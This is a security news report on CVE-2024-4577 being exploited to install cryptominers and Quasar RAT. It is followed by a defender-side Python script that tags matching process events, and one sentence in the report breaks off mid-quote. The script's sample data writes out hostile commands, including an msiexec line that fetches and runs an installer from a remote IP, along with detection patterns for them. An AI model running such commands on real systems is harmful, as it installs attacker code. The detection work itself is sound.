Threat actors are exploiting a serious security flaw in PHP to deliver cryptocurrency miners and remote access trojans (RATs) such as Quasar RAT.
The vulnerability, assigned the CVE identifier CVE-2024-4577, is an argument injection flaw in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to execute arbitrary code.
Cybersecurity company Bitdefender said it has observed a surge in exploitation attempts against CVE-2024-4577 since late last year, with a significant concentration in Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%), and India (0.33%).
About 15% of the exploitation attempts involved the commands “whoami” and “echo
Martin Zugec, technical solutions director at Bitdefender, said that at least 5% of the attacks culminated in the deployment of the XMRig cryptocurrency miner.
“Another smaller campaign involved the deployment of Nicehash miners, a platform that allows users to sell computing power for cryptocurrency,” Zugec said. “The miner process was disguised as a legitimate application, such as javawindows.exe, to evade detection.”
Other attacks have been found to weaponize the flaw to deliver remote access tools such as the open-source Quasar RAT, as well as to execute malicious Windows Installer (MSI) files hosted on remote servers using cmd.exe.
In something of a curious twist, the Romanian company said it also observed attempts to modify the firewall configuration on vulnerable servers to block access from known malicious IPs associated with the exploit.
This unusual behaviour raises the possibility that rival cryptojacking groups are competing for control over susceptible resources and preventing those already under their control from being targeted a second time. It is consistent with historical observations that cryptojacking attacks are known to kill rival miner processes before deploying their own payload.
The development comes shortly after Cisco Talos described a campaign that has been weaponizing PHP flaws in attacks targeting Japanese organizations since the start of the year.
Users are advised to update their PHP installations to the latest version to protect against potential threats.
“Since most campaigns are using LOTL tools, organizations should consider restricting the use of tools such as PowerShell within the environment to only privileged users such as administrators,” Zugec said.
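A defender-side detection heuristic for the post-exploitation behaviours reported above (a shell spawned by the CGI worker, whoami/echo checks, firewall changes, MSI files fetched from remote servers, a miner masquerading as javawindows.exe), written here as an added example and not code from Bitdefender or the article. The event field names, the php-cgi.exe parent name and the sample events are assumptions constructed for the example.

```python
"""Tag Windows process-creation events that match the CVE-2024-4577 follow-on
activity described in the article. Assumption: each event is a dict with the
keys parent, image and cmdline; the CGI worker is assumed to be php-cgi.exe."""
import re

CGI_PARENT = "php-cgi.exe"
SHELLS = {"cmd.exe", "powershell.exe"}

# Behaviours the article reports, expressed as command-line patterns.
# "echo" is noisy on its own; it is kept because the article lists it.
RULES = [
    ("recon",        re.compile(r"\b(whoami|echo)\b", re.I)),
    ("firewall_mod", re.compile(r"\bnetsh\b.*\badvfirewall\b", re.I)),
    ("remote_msi",   re.compile(r"\bmsiexec\b.*\bhttps?://", re.I)),
    ("miner_mask",   re.compile(r"javawindows\.exe|xmrig", re.I)),
]

def classify(event):
    """Return a list of tags for one event; an empty list means nothing matched."""
    tags = []
    if event["parent"].lower() == CGI_PARENT and event["image"].lower() in SHELLS:
        tags.append("cgi_spawned_shell")  # a web worker should never launch a shell
    for name, pattern in RULES:
        if pattern.search(event["cmdline"]):
            tags.append(name)
    return tags

SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"parent": "php-cgi.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": "php-cgi.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c netsh advfirewall firewall add rule name=blk dir=in "
                "action=block remoteip=203.0.113.5"},
    {"parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i http://203.0.113.9/setup.msi /qn"},
    {"parent": "services.exe", "image": "javawindows.exe",
     "cmdline": "javawindows.exe --config c.json"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

def scan(events=SAMPLE_EVENTS):
    """Return (image, tags) for every event that matched at least one rule."""
    hits = []
    for event in events:
        tags = classify(event)
        if tags:
            hits.append((event["image"], tags))
    return hits

if __name__ == "__main__":
    for image, tags in scan():
        print(image, tags)
```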